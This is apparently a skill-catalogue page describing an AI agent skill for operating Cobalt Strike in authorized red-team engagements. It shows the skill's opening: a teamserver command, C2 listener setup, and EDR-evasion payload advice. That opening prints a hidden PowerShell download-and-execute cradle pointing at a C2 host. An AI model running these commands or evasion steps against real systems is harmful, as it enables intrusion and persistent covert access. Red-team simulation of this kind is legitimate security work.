cobalt-strike-beacon-operations

cobalt-strike-beacon-operations is a skill for Claude Code, Codex from ShulkwiSEC/bb-huge. It costs 94 tokens per session (2,767 once invoked), scanned A, original, MIT.

An operational guide for Cobalt Strike, a commercial tool used by authorized red teams to simulate attackers inside a network.

In plain words
What is it for?
Setting up red-team infrastructure, deploying Beacon, performing post-exploitation and lateral movement, and assessing endpoint detection and response.
Why use it?
It organizes the work involved in deploying its Beacon agent, maintaining command-and-control communication, and testing security monitoring.

Skill for Claude CodeCodex

Written for no agent in particular: nothing here depends on one.

Needs its repository: it runs a file that does not travel with it, so clone the repository first. The line is ./teamserver 10.10.10.100 RedTeam2024! ./profiles/amazon.profile.

Good fit Setting up red-team infrastructure, deploying Beacon, performing post-exploitation and lateral movement, and assessing endpoint detection and response.

Compare 6 skills from other repositories ↓
Install

Getting it into your agent

It runs from inside its repository, so the clone comes first — what it calls does not travel with the file alone.

Clone the repo
git clone --depth 1 https://github.com/ShulkwiSEC/bb-huge
agentmods
npx agentmods add skills/shulkwisec/bb-huge/cobalt-strike-beacon-operations

Made for: Claude Code, Codex.

Wrote this? Show the measurements

A badge with what this costs and how it scanned, read live from this page, so it follows the numbers instead of freezing them. Markdown for a README, HTML for a documentation site or a project page.

agentmods badge for cobalt-strike-beacon-operations

README.md
[![agentmods](https://agentmods.dev/badge/skills/shulkwisec/bb-huge/cobalt-strike-beacon-operations/github.svg)](https://agentmods.dev/skills/shulkwisec/bb-huge/cobalt-strike-beacon-operations)
Your own site
<a href="https://agentmods.dev/skills/shulkwisec/bb-huge/cobalt-strike-beacon-operations"><img src="https://agentmods.dev/badge/skills/shulkwisec/bb-huge/cobalt-strike-beacon-operations/github.svg" alt="Measured on agentmods" height="20"></a>

Or the 80×15 button, for a site that already has a row of RSS and ATOM ones. Only the verdict fits; the numbers stay here.

agentmods 80×15 button for cobalt-strike-beacon-operations

Your own site · 80×15
<a href="https://agentmods.dev/skills/shulkwisec/bb-huge/cobalt-strike-beacon-operations"><img src="https://agentmods.dev/badge/skills/shulkwisec/bb-huge/cobalt-strike-beacon-operations.svg" alt="Reviewed on agentmods" width="80" height="20"></a>
Per session 94 Skills are progressive disclosure: only the name and description are preloaded; the body loads when the skill is used.
When invoked 2,767 The whole file, excluding the scripts and references it only reads on demand.
Security scan A 0 findings. A grade says what 26 rules found in the file — not that it is safe.
Origin original No closer match found in the catalogue.
Token cost

What it costs to keep this loaded

Counted locally with the o200k_base tokenizer, which is exact for GPT models; Claude uses its own tokenizer and its counts differ. Treat this as one consistent yardstick across the catalogue rather than a bill. Prices are per million input tokens.

ModelPer sessionOnce invoked
Fable 5.1 $0.00094 $0.02767
Opus 5 $0.00047 $0.01384
Sonnet 5 $0.00019 $0.00553
Haiku 4.5 $0.00009 $0.00277

Measured 7d ago against content hash c7c9354f26fb, method: parsed. Prices are Anthropic first-party input rates as of 2026-09-10, from the pricing page.

Security

Grade A, and why

cobalt-strike-beacon-operations scanned grade A with 0 findings against 26 rules in 11 categories — prompt injection, anti-refusal, data exfiltration, privilege escalation, supply chain, agent snooping, system-prompt leakage, SSRF and excessive agency — measured 7d ago.

The scan reads SKILL.md. This mod also ships 1 executable file (scripts/process.py), listed below but not scanned — reading those needs a real analyzer, not pattern matching.

A static scan of the body, not an audit. Every finding is printed with the line that produced it so you can judge whether it matters here. A mod is markdown that instructs an agent; that is exactly why what it instructs is worth reading.

Nothing flagged

None of the 26 patterns this scan looks for appear in this file: no shell pipes, no recursive deletes, no credential paths, no hidden text, no instruction-override or anti-refusal phrasing, no agent-config snooping. That is not a guarantee, it is the absence of the things that are checkable.

Origin

Copies of this mod

1 near-identical copy found in the catalogue:

skills/curated/cobalt-strike-beacon-operations/SKILL.md · 306 lines

How it starts

The opening of the file, as written. The whole thing — 306 lines — stays where its author put it; the contents beside it link to each section on GitHub.

Cobalt Strike Beacon Operations

When to Use

  • During authorized red team engagements requiring professional C2 operations
  • When conducting assumed-breach assessments with persistent access requirements
  • When simulating advanced persistent threat (APT) operations
  • When testing EDR/AV detection and security monitoring capabilities
  • When you need advanced post-exploitation with opsec considerations

When NOT to use: For open-source alternatives, use sliver-c2-implant-operations or havoc-c2-demon-operations skills. NEVER use without explicit written authorization.

Prerequisites

  • Licensed Cobalt Strike (valid license required)
  • Red team infrastructure: redirectors, domains, SSL certificates
  • Malleable C2 profile (don't use default!)
  • Understanding of OPSEC principles
  • Written authorization (Rules of Engagement document)
  • Kill chain plan agreed with engagement stakeholders

Workflow

Phase 1: Infrastructure Setup

# Start Team Server (on Red Team server)
./teamserver <TEAM_SERVER_IP> <PASSWORD> <MALLEABLE_PROFILE>

# Example with custom profile:
./teamserver 10.10.10.100 RedTeam2024! ./profiles/amazon.profile

# Connect Cobalt Strike client
# File → New Connection
# Host: 10.10.10.100
# Port: 50050
# Password: RedTeam2024!

# Configure Listeners:
# Attacks → Web Drive-by → Scripted Web Delivery (for quick staging)
# Cobalt Strike → Listeners → Add
# Types: HTTP, HTTPS, DNS, SMB (named pipe), TCP

# HTTPS Listener (recommended):
# Name: https-c2
# HTTP Host: c2.attacker-domain.com
# HTTP Port: 443
# HTTPS Certificate: Let's Encrypt cert for your domain
# Profile: Use malleable C2 profile that mimics legitimate traffic

Phase 2: Payload Generation & Delivery

# Generate payloads:
# Attacks → Packages →

# Staged payload (small, needs callback to download full beacon):
# Windows Executable (exe, dll, svc)
# HTML Application (hta)

# Stageless payload (full beacon, no callback needed):
# Windows Executable (Stageless) — preferred for opsec
# Raw shellcode — use with custom loaders

# Payload best practices:
# - Use stageless over staged (less network artifacts)
# - Generate raw shellcode and use custom loader
# - Sign payloads with valid code signing certificate
# - Use process injection instead of on-disk execution
# - Obfuscate shellcode to evade static signatures

# Scripted Web Delivery:
# Attacks → Web Drive-by → Scripted Web Delivery
# Generates: powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://c2/a')"

# Custom shellcode loader (example concept):
# 1. Generate raw shellcode: Payloads → Stager → Raw
# 2. Encrypt with AES-256
# 3. Embed in custom C# loader
# 4. Add sandbox evasion checks
# 5. Use syscalls for injection to bypass EDR hooks

Read the full file on GitHub · 306 lines

Files

What ships with it

2 files beside SKILL.md in the same directory: the scripts, references and assets a skill reads on demand. Not counted in the per-session cost; read them before you install if any of them is executable.

Changes

What this file has done since we first saw it

Hashed on every crawl. A supply-chain change to an agent config is a question of when, not whether, so the history is kept rather than the latest state alone.

  1. 7d ago First seen · 306 lines · 94 tokens per session scan A c7c9354f26fb

Subscribe to this mod's changes

cobalt-strike-beacon-operations is a skill published in the GitHub repository ShulkwiSEC/bb-huge (22 stars, last pushed 2mo ago), licensed MIT. It adds 94 tokens to every session and 2,767 once invoked, about $0.0005 per session on Opus 5. A static security scan graded it A with 0 findings. No closer match exists in the catalogue, so it is treated as the original; first seen 2026-09-03.

Related

Other skills, from other repositories

cobalt-strike-beacon-operations

Operate Cobalt Strike for red team engagements including Beacon deployment, C2 communication, post-exploitation, lateral movement, and evasion. Use this skill when conducting authorized red team operations that require a commercial C2 framework. Covers malleable C2 profiles, staged/stageless payloads, sleep and jitter…

akashrpatil/awesome-offensive-security-skills · 94 tokens

conducting-pass-the-ticket-attack

Pass-the-Ticket (PtT) is a lateral movement technique that uses stolen Kerberos tickets (TGT or TGS) to authenticate to services without knowing the user's password. By extracting Kerberos tickets fro.

26zl/cybersec-toolkit · 50 tokens

building-c2-infrastructure-with-sliver-framework

Build and configure a resilient command-and-control infrastructure using BishopFox's Sliver C2 framework with redirectors, HTTPS listeners, and multi-operator support for authorized red team engagements.

26zl/cybersec-toolkit · 46 tokens

building-c2-infrastructure-with-sliver-framework

Build and configure a resilient command-and-control infrastructure using BishopFox's Sliver C2 framework with redirectors, HTTPS listeners, and multi-operator support for authorized red team engagements.

autohandai/community-skills · 46 tokens

cobalt-strike-malleable-c2

Construct and deploy advanced Malleable C2 profiles in Cobalt Strike to deeply obfuscate Command and Control traffic. Use this skill to camouflage malicious beacons as legitimate jQuery, Amazon AWS, or Microsoft Office 365 HTTP/HTTPS web traffic, bypassing network-based IDS/IPS.

akashrpatil/awesome-offensive-security-skills · 71 tokens

conducting-pass-the-ticket-attack

Perform Pass-the-Ticket (PtT) lateral movement by extracting Kerberos TGT/TGS tickets from LSASS memory on a compromised host and injecting them into another session to impersonate the ticket owner without knowing their password. Use during authorized post-exploitation to move laterally or escalate access via stolen…

Youngmaidainon/Agent-Level-Up · 85 tokens